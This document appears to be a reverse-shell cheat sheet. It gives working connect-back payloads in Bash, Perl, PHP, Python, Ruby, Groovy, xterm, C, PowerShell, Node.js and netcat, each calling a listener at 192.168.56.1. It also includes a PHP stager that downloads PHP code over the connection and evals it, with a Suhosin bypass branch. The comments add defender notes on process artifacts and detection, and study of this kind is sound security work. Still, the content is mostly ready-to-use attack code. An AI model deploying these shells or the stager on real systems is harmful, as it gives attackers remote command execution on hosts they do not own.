Reverse Shells
Bash
# Interactive bash (-i): stdout and stderr are redirected (>&) to bash's built-in
# /dev/tcp/<host>/<port> pseudo-device and stdin is read back from the same
# socket (0>&1). No helper binary runs, so the host-side artifact is a bash
# process whose fds 0/1/2 are a TCP socket. Port 443 carries plain TCP here, not
# TLS, so a TLS-inspecting proxy or egress filter sees a non-TLS stream on an
# HTTPS port.
bash -i >& /dev/tcp/192.168.56.1/443 0>&1
Perl
# Perl form: socket()+connect() to $i:$p, then STDIN/STDOUT/STDERR are re-opened
# as duplicates of the socket handle S (open ..., ">&S") before exec'ing an
# interactive /bin/sh. exec replaces the perl process image, so what survives is
# a /bin/sh -i whose fds 0/1/2 are a socket and whose parent is whatever started
# perl.
perl -e 'use Socket;$i="192.168.56.1";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
PHP
# fsockopen() returns a stream; the exec'd shell's redirections (<&3 >&3 2>&3)
# assume that stream sits on file descriptor 3 (0-2 being php's own stdio).
# Artifact: a php process with a child sh -i whose stdio descriptors are the
# socket.
php -r '$sock=fsockopen("192.168.56.1",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
<?php
// Staged loader, not an interactive shell: it connects to $ip:$port, reads a
// 4-byte big-endian length prefix, then exactly that many bytes of PHP source,
// and eval()s them. The live connection is handed to the received code through
// $GLOBALS['msgsock'] / $GLOBALS['msgsock_type'].
// Defender notes: error_reporting(0) hides every failure; three connection
// paths are tried in turn, so blocking only one of stream_socket_client /
// fsockopen / socket_create via disable_functions is not sufficient; the eval()
// of network-received data is the behaviour to alarm on, and eval is a language
// construct that disable_functions cannot remove.
error_reporting(0);
$ip = '192.168.56.1';
$port = 4444;
// Path 1: stream_socket_client(). Each path calls through the $f variable, so
// the function name never appears as a literal call site in the source.
if (($f = 'stream_socket_client') && is_callable($f)) {
$s = $f("tcp://{$ip}:{$port}");
$s_type = 'stream';
}
// Path 2: fsockopen(), if path 1 was unavailable or failed.
if (!$s && ($f = 'fsockopen') && is_callable($f)) {
$s = $f($ip, $port);
$s_type = 'stream';
}
// Path 3: raw socket_create()/socket_connect(); the @ silences connect warnings.
if (!$s && ($f = 'socket_create') && is_callable($f)) {
$s = $f(AF_INET, SOCK_STREAM, SOL_TCP);
$res = @socket_connect($s, $ip, $port);
if (!$res) {
die();
}
$s_type = 'socket';
}
if (!$s_type) {
die('no socket funcs');
}
if (!$s) {
die('no socket');
}
// Read the 4-byte length prefix with the API that matches the connection type.
switch ($s_type) {
case 'stream': $len = fread($s, 4);
break;
case 'socket': $len = socket_read($s, 4);
break;
}
if (!$len) {
die();
}
// "N" = unsigned 32-bit big-endian (network order).
$a = unpack("Nlen", $len);
$len = $a['len'];
$b = '';
// Accumulate until the whole stage has arrived; individual reads may be short.
while (strlen($b) < $len) {
switch ($s_type) {
case 'stream': $b .= fread($s, $len-strlen($b));
break;
case 'socket': $b .= socket_read($s, $len-strlen($b));
break;
}
}
// Export the connection so the received stage can keep using it.
$GLOBALS['msgsock'] = $s;
$GLOBALS['msgsock_type'] = $s_type;
// If Suhosin has disabled eval, create_function() compiles the same string
// instead (it is eval by another name; removed in PHP 8.0, so this branch is
// dead on current PHP). Otherwise eval() the stage directly.
if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) {
$suhosin_bypass=create_function('', $b); $suhosin_bypass();
}
else {
eval($b);
}
die();
?>
Python
# socket() + connect(), then os.dup2() copies the socket onto fds 0, 1 and 2
# before subprocess.call() starts an interactive /bin/sh that inherits them.
# Unlike the exec-based variants, python stays resident as the shell's parent,
# so the artifact is a python -> sh process pair with socket stdio.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.1",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Ruby
# TCPSocket.open(...).to_i yields the socket's descriptor number, which sprintf
# splices into the shell redirections; exec then replaces ruby with a /bin/sh -i
# that reads and writes that descriptor.
ruby -rsocket -e'f=TCPSocket.open("192.168.56.1",443).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Java
// Groovy rather than Java syntax (untyped assignment, `as String[]`), i.e. a
// script-console style snippet. Runtime.exec() starts bash -c; the script opens
// fd 5 read/write on bash's /dev/tcp pseudo-device, then `cat <&5 | while read
// line` runs each received line as a command with its output sent back on fd 5.
// This is a line-at-a-time command loop, not an interactive shell (no tty).
// Host-side artifact: a JVM process spawning bash, which in turn spawns cat.
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.56.1/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
// Blocks the calling thread until the loop ends (the remote end closes).
p.waitFor()
XTerm
# X11 variant: xterm on the target is told to render on display :1 of the remote
# host, i.e. TCP port 6001, which only works if that X server accepts remote TCP
# clients. From a server, an outbound connection to 6000+N is itself a signal;
# X servers should not listen on TCP (Xorg's -nolisten tcp default).
xterm -display 192.168.56.1:1
C
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
// Connect-back shell in C: fills a sockaddr_in for the listener, opens a TCP
// socket, connects, copies the socket onto fds 0/1/2 and replaces the process
// with /bin/sh. Artifact: a /bin/sh whose stdio descriptors are a socket,
// started by execve with NULL argv and envp (no argv, empty environment),
// which process-start telemetry may record as anomalous in its own right.
int main(void)
{
int i; // used for dup2 later
int sockfd; // socket file descriptor
socklen_t socklen; // socket-length for new connections (declared but unused here)
struct sockaddr_in srv_addr; // listener (connect-back) address
srv_addr.sin_family = AF_INET; // server socket type address family = internet protocol address
srv_addr.sin_port = htons( 443 ); // connect-back port, converted to network byte order
srv_addr.sin_addr.s_addr = inet_addr("192.168.56.1"); // connect-back ip , converted to network byte order
// create new TCP socket
sockfd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP );
// connect socket (the return value is not examined)
connect(sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr));
// dup2-loop to redirect stdin(0), stdout(1) and stderr(2)
for(i = 0; i <= 2; i++)
dup2(sockfd, i);
// replace this process image with /bin/sh; argv and envp are both NULL
execve( "/bin/sh", NULL, NULL );
}
PowerShell
# PowerShell TCP client that reads text from the connection, runs it with
# Invoke-Expression (iex) and writes the output back. It is a command loop, not
# a pty: each Read() chunk is treated as one script to evaluate.
# Defender notes: the connection originates from the PowerShell host process;
# the iex of network-supplied text is captured by Script Block Logging (event
# 4104) and scanned by AMSI before it runs; Constrained Language Mode would not
# allow New-Object on System.Net.Sockets.TCPClient in the first place.
# Setup connection to the attacker listener (change IP and PORT)
$client = New-Object System.Net.Sockets.TCPClient('192.168.56.1', 4444);
# Stream Handle
$stream = $client.GetStream();
# Recv buffer (64 KiB of zeros)
[byte[]]$bytes = 0..65535|%{0};
# Loop until Read() returns 0, i.e. the remote end closed the connection
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){
# Get command (bytes to string)
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes, 0, $i);
# Execute Command; 2>&1 folds errors into the captured output
$sendback = (iex $data 2>&1 | Out-String);
# Send back PS header PS C:\Windows\TEMP\>
$sendback2 = $sendback+'PS '+(pwd).Path + '> ';
# Convert result (String to bytes)
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
# Send result
$stream.Write($sendbyte, 0, $sendbyte.Length);
$stream.Flush();
};
NodeJS
// Node variant: spawns /bin/sh first, then wires the TCP socket to the child's
// stdio with pipes in both directions once connect() completes. Unlike the
// dup2/exec variants the socket never sits on the shell's own descriptors:
// node stays resident and relays, so the artifact is a node process holding the
// socket plus a child sh with pipe stdio.
(function() {
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(4444, "192.168.56.1", function() {
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
// The regex literal returned here is never used by the caller.
return /a/;
})();
Netcat
# netcat with -e runs the named program with its stdio on the connection. The
# -e option is not present in every netcat build; on hosts where it is, not
# shipping nc (or using a build without -e) removes this path, and an nc process
# with a child sh is the obvious host artifact.
nc -e /bin/sh 192.168.56.1 4444